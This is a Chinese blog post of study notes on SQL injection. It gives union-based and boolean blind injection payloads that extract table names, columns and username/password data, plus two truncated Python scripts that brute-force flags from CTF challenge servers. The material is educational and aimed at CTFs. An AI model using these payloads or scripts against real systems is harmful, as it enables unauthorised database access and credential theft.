SQL注入-Day17

最新推荐文章于 2024-09-02 07:02:10 发布
最新推荐文章于 2024-09-02 07:02:10 发布
阅读量2.3k 收藏
点赞数
分类专栏: 学习笔记 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kanna_bush_t/article/details/122948383
版权

SQL注入 联合查询 布尔盲注 数据库安全 信息泄露
关键词由CSDN通过智能技术生成

四、union 联合注入(单引号闭合字符型为例)

4.5 查库

?id=-1' union select 1,(select group_concat(table_name) from information_sch

4.5.1 查某一个库中的表

注意:仅仅是查当前数据库 database() 的表,由于处于当前数据库下,是不能查看其它数据库中数据的。

 4.5.2 查列

?id=-1' union select 1,(select group_concat(column_name) from information_schema

4.5.3 查内容, ~ 连接 

?id=-1' union select 1,(select group_concat(concat_ws('~',username,password)

//同时查三列数据的话
?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from u

五、Boolean 盲注 

5.1 手动:结合 Burp 爆破进行

5.1.1 查数据库长度

?id=1' and length(database())=1--+ 
//爆破数字 1

5.1.2 判断库名组成 security 

?id=1' and left(database(),1)='a'--+
//爆破字母 a

?id=1' and ascii(substr(database(),1,1))='b'--+
//爆破 ascii 值 b

5.1.3 查表 users 

?id=1' and ascii(substr((select table_name from information_schema.tables wh

//同时爆破数字a,和 数字b,其中 b 是 ascii 值

5.1.4 查列 username password 

?id=1' and ascii(substr((select column_name from information_schema.tables w
//同时爆破数字a,和 数字b,其中 b 是 ascii 值

5.1.5 查内容 

?id=1' and ascii(substr((select username from security.users limit a,1),1,1)
//爆破 ascii 值 b

?id=1' and ascii(substr((select password from security.users limit 0,1),1,1)
//爆破 ascii 值 b

5.2 脚本

5.2.1 直接法(较慢,正确率高)

import requests
url = "http://ba63d0df-d99d-4cba-a692-5027868780b6.challenge.ctf.show:8080/a 
b="{zxcvbnmasdfghjklqwertyuiop-1234567890}_" // 字典库,包含小写字母数字-下划线}{ 
flag = '' 
for i in range (1,50): 
for h in b: 
//payload根据题目环境构造有效payload 
payload = "' or if((mid((select group_concat(f1ag) from ctfshow_flxg
//payload = "' or if((mid((select database()),{},1)='{}'),1,0) -- ".f
//payload = "' or if((mid((select group_concat(column_name) from info
//payload = "' or if((mid((select+group_concat(table_name) from infor
//print(payload)
data = {
"username":payload, //注入点
"password":1
}
s=requests.post(url,data=data) //发送post请求
//print(s.text)
if "\\u5bc6\\u7801\\u9519\\u8bef" in s.text: // 根据不同回显,找到有效的
flag+=h //对于正确情况保留字符串
print('flag is {}'.format(flag))
break
if flag[-1] == "}":// 找到完整的flag
print("flag :"+flag)
break

5.2.2 二分法

import requests 
url = "http://ecaca1c3-ce93-4f20-82b6-ea325d85e6c3.node4.buuoj.cn:81/search. 
i = 0 
flag = '' 
while True: 
i+=1 
header = 32 
tail = 128 
while header<tail:
mid = (header+tail)>>1
data = {
'id':f"1^(ord(substr((select(group_concat(password))from(F1naI1y
}
s=requests.get(url,params=data)
if 'Click' in s.text:
header = mid+1 // sql语句正确的时候
else:
tail = mid // sql语句错误执行
if header!=32:
flag+=chr(header)
print(flag)
else:
break

 

kanna_bush_t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【PTE-day01 sql注入
samRsa
11-05 187
database() #数据库名称version() #数据库版本user() #数据库使用者group_concat() #将参数拼接到一行集中输出limit a,b #依次取值 从a+b的位置取b的值进行输出hex() #对参数进行16进制编码unhex() #对参数进行16进制解码into outfile() #向服务器写入指定的文件。
【1day】复现宏景HCM codesettree SQL注入漏洞(CNVD-2023-08743)
记录并分享学习安全的知识点..
07-26 1291
北京宏景世纪软件股份有限公司 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息。
sql注入
zejiiii的博客
02-15 3056
SQL注入 一 注入分类 注入点分类 数字型注入 字符型注入 提交方式分类 提交方式分类 GET 方式注入 POST 方式注入 COOKIE 方式注入 HTTP 头部注入:XFF,UA,REFRERE 是否回显 联合查询 布尔盲注 报错注入 时间盲注 二次注入 堆叠查询(同时执行多条语句) 二 注入判断 工具扫描:网站漏扫工具,AWVS、AppScan、OWASP-ZAP、Nes
limit 后注入_web安全之SQL注入基础
weixin_39608394的博客
12-03 233
本文是web安全系列第一章,主要介绍SQL注入基础。SQL注入基础SQL注入介绍Web请求响应过程:什么是SQL注入?就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。为什么会产生sql注入?开发人员可以使用动态SQL语句创建通用,灵活的应用。动态SQL语句是在执行过程中构造的,...
SQL注入(二)
weixin_48914455的博客
02-27 4419
对一个简单系统的SQL注入得到管理员账号密码
SQL注入(笔记)
m0_62617107的博客
05-14 349
数据库基础 1.Mysql基础操作 2.Mysql表一些基本操作 3.Mysql的常用变量(函数) 4.Mysql的常用符号 1. & and 2. || or 3. xor 5.Mysql的常用函数 什么是SQL注入? 对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾,添加额外的SQL语句 SQL注入的危害 ·数据库信息泄露:数据库中存放的用户的隐私信息的泄露 ·网页篡改:通过操作数据库对特定网页进..
SQL DUMB Series-3 & 4 通关过程分享(sql注入学习DAY2)
deja_vuDM的博客
06-10 1196
单引号加括号,双引号加括号
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 后台 SQL 注入到 RCE 通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞...
【1day】复现GeoServer CVE-2023-25157 SQL注入
记录并分享学习安全的知识点..
07-19 818
​ GeoServer是一个开源的地图服务器,它是遵循OpenGIS Web服务器规范的J2EE实现,通过它可以方便的将地图数据发布为地图服务,实现地理空间数据在用户之间的共享。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。 ​
MySQL数据库增删查改(基础)CRUD
最新发布
chendemingxxx的博客
09-02 799
比如说:创建一张学生表,有姓名,学号。插入两个学生。可能有点草率看看例子: 顺序不是问题,后面参数和前面括号参数对等就行。比如说上面的例子:把id和name参数倒过来了,后面参数一一对应也可以。不推荐使用全列查询原因:比如说上面例子我只要id或者说只要name;当然也可以查询多个列: 比如说我们创建一个这样的表命令:第一个 效果:第三个总分效果:拓展一个现象: 拓展:语法:比较运算符:逻辑运算符:解释:%在mysql这里代表的是多个任意字符,_代表的是 一个任意字符。揭晓来才是修改硬盘里面的内容。案例:
PostgreSQL遍历所有的表并为其创建基于某个字段的索引
致力于互联网、物联网领域知识内容分享
08-29 566
以下以"collect_time"字段为例,其他字段请自行全局替换。
sql-labs51-55通关攻略
m0_75036923的博客
08-30 826
1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+' and updatexml(1,concat(0x7e,(select group_concat(column
一步迅速了解Spring框架
ymr1843762281的博客
08-28 537
将程序中的一些公共的非业务代码分离提取出来,然后在业务代码执行的时候,给他们横切进来,使用的动态代理的机制实现,在我们的业务代码,不显示调用,但是执行业务代码,会通过代理对象,调用非业务代码。以前我们在程序中需要对象,都是自己new,例如:new StudentDao对象,Spring 是一个轻量级的,IOC 和 AOP 的一站式 Java 开发框架,是为了简化企。除了核心的IOC和AOP功能之外,还对数据访问层,web层都有封装,所以是一站式的。inversion of Control 控制反转。
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 734
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
【解决】sql中包含问号(?),导致mybatis解析错误
奔跑的菜鸟的Run博客
08-30 361
被替换了 而不是 我们参数 ,参数的位置还是空的。下面给出两种我测试都可以的方案,但是个人比较推荐第二种方案。这个sql在我们的sql连接器中执行是完全没问题的,但是在mybatis中使用这个sql的时候。也就是在问号的前面多加一个问号,这样就能解决了。会被mybatis当作占位符 替换成参数。给解析成变量 导致sql查询失败。解析参数会把 sql语句中的。sql语句中本身包含。使用pg数据库内置函数。
PostgreSQL技术内幕6:PostgreSQL索引技术
qq_40529346的博客
09-01 1924
本文主要介绍PG的索引技术,包含PG支持的索引类型,语法,查看方式,以及其中B-Tree索引的原理解析和源码解读。
SQL【1】基础语法
m0_68339197的博客
09-01 396
值的格式:外有括号,里面用逗号隔开,不一定是整整一行。列名='值' 表示要该项为该值。默认是升序的,当然扩充下词汇量。引号:文本,无需引号:数值。加了distinct后。
sql-labs41-45关通关攻略
m0_75036923的博客
08-28 902
第43关第44关第45关。
Pangolin SQL注入测试工具使用指南与技巧
"本文档是关于安全技术工具Pangolin的使用说明,Pangolin是一款专业的SQL注入测试工具,旨在帮助渗透测试人员检测和利用SQL注入漏洞。文档内容包括Pangolin的简介、开始使用的步骤、基本和高级功能介绍、典型案例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值